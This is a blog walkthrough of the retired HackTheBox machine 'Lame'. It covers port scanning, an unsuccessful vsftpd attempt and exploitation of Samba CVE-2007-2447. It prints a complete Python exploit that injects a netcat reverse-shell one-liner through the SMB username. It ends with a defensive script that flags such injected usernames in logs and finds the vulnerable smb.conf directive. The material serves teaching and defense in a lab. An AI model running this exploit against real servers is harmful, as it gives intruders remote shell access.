
Lame – HTB Walkthrough

Lame is an Easy rated and retired machine on HackTheBox. As always, we start with nmap, including the -p- switch to enumerate all ports.

sudo nmap -sV -sC -p- 10.10.10.3

We have FTP, SMB, and something I don't recognise and will have to look up. Let's concentrate on FTP and SMB first.

Try anonymous login on FTP; it is allowed, and we are in.

There doesn't seem to be anything in here, though. What about the version? Let's look up vsftpd 2.3.4.

There are a couple of exploits, but I don't really want to use Metasploit.

I came across this Python exploit. It seems easy enough to get going:

https://github.com/ahervias77/vsftpd-2.3.4-exploit

But it didn't seem to work and just hangs. It might be patched?

I can't really find any other exploits, so let's enumerate port 445 a little further and search for vulnerabilities.

sudo nmap --script smb-vuln* -p 139,445 10.10.10.3

This doesn’t really help us. We have the Samba version from our nmap, so let’s use Searchsploit.

There seem to be a few. After a quick Google search I come across CVE-2007-2447:

https://github.com/amriunix/CVE-2007-2447/blob/master/usermap_script.py

We cat the file. It looks simple enough: it should return a reverse shell to us via Netcat.

#!/usr/bin/python
# -*- coding: utf-8 -*-

# From : https://github.com/amriunix/cve-2007-2447
# case study : https://amriunix.com/post/cve-2007-2447-samba-usermap-script/
# Requires the pysmb package, which provides smb.SMBConnection.

import sys
from smb.SMBConnection import SMBConnection

def exploit(rhost, rport, lhost, lport):
    # Reverse shell one-liner: a named pipe ties netcat's input and output to /bin/sh.
    payload = 'mkfifo /tmp/hago; nc ' + lhost + ' ' + lport + ' 0</tmp/hago | /bin/sh >/tmp/hago 2>&1; rm /tmp/hago'
    # The username reaches "username map script" unquoted, so the backticks run the payload.
    username = "/=`nohup " + payload + "`"
    conn = SMBConnection(username, "", "", "")
    try:
        conn.connect(rhost, int(rport), timeout=1)
    except Exception:
        # The session never completes normally; the timeout or error means the username was sent.
        print('[+] Payload was sent - check netcat !')

if __name__ == '__main__':
    print('[*] CVE-2007-2447 - Samba usermap script')
    if len(sys.argv) != 5:
        print("[-] usage: python " + sys.argv[0] + " <RHOST> <RPORT> <LHOST> <LPORT>")
    else:
        print("[+] Connecting !")
        rhost = sys.argv[1]
        rport = sys.argv[2]
        lhost = sys.argv[3]
        lport = sys.argv[4]
        exploit(rhost, rport, lhost, lport)

Set up our listener on port 13376 and run the exploit. We are on the box.

From here we can grab the user and root flags.
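For the defensive side of the same bug, here is a small Python script I have added to this write-up (it is not from the walkthrough or from the CVE-2007-2447 repository above). It shows the two checks that matter on a Samba host: whether the "username map script" directive is actually active in smb.conf, and whether any authentication attempts carried shell metacharacters in the username, which is the tell-tale of this technique. The Samba log line shape it parses ("Authentication for user [NAME] -> [NAME] FAILED ...") and the sample log lines and config are my own constructed assumptions, not captures from the box.

```python
import re

# Shell metacharacters that should never appear in a legitimate SMB username.
# CVE-2007-2447 works by smuggling a backtick-wrapped command through the
# username so that "username map script" hands it to a shell unquoted.
SHELL_META_RE = re.compile(r"[`;|&<>]|\$\(")

# Samba auth log line as assumed here (constructed shape, see lead-in):
#   ... check_ntlm_password: Authentication for user [NAME] -> [NAME] FAILED ...
AUTH_USER_RE = re.compile(r"Authentication for user \[(.*?)\] -> \[")


def is_usermap_injection(username):
    """Return True when an SMB username carries shell metacharacters."""
    return SHELL_META_RE.search(username) is not None


def flag_suspicious_logins(log_lines):
    """Return usernames from Samba auth log lines that look like injection attempts."""
    flagged = []
    for line in log_lines:
        match = AUTH_USER_RE.search(line)
        if match and is_usermap_injection(match.group(1)):
            flagged.append(match.group(1))
    return flagged


def active_usermap_script_lines(smb_conf):
    """Return the uncommented 'username map script' directives found in an smb.conf."""
    hits = []
    for raw in smb_conf.splitlines():
        line = raw.strip()
        # Samba treats both '#' and ';' as comment markers.
        if not line or line.startswith(("#", ";")):
            continue
        key, _, _value = line.partition("=")
        if key.strip().lower() == "username map script":
            hits.append(line)
    return hits


# Constructed sample data, not captured from any real system.
SAMPLE_LOG = [
    "[2024/01/01 10:00:00, 2] auth/auth.c:check_ntlm_password(319)",
    "  check_ntlm_password: Authentication for user [mark] -> [mark] FAILED with error NT_STATUS_WRONG_PASSWORD",
    "  check_ntlm_password: Authentication for user [/=`nohup id`] -> [/=`nohup id`] FAILED with error NT_STATUS_NO_SUCH_USER",
]

SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   ; username map script = /etc/samba/scripts/mapusers.sh
   username map script = /etc/samba/scripts/mapusers.sh
"""


def report():
    """Run both checks over the constructed samples and return the findings."""
    return {
        "suspicious_logins": flag_suspicious_logins(SAMPLE_LOG),
        "usermap_script": active_usermap_script_lines(SAMPLE_SMB_CONF),
    }


if __name__ == "__main__":
    print(report())
```

Point the functions at your real log file and smb.conf instead of the samples. A non-empty "usermap_script" result on a Samba 3.0.x box means the directive should be removed or the server upgraded, and any flagged login is worth an alert whether or not the exploit succeeded.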

Mark

Mark likes CTFs, his home lab and walks on the beach. He holds SANS certifications in Forensics and Information Security and currently works in the cybersecurity field.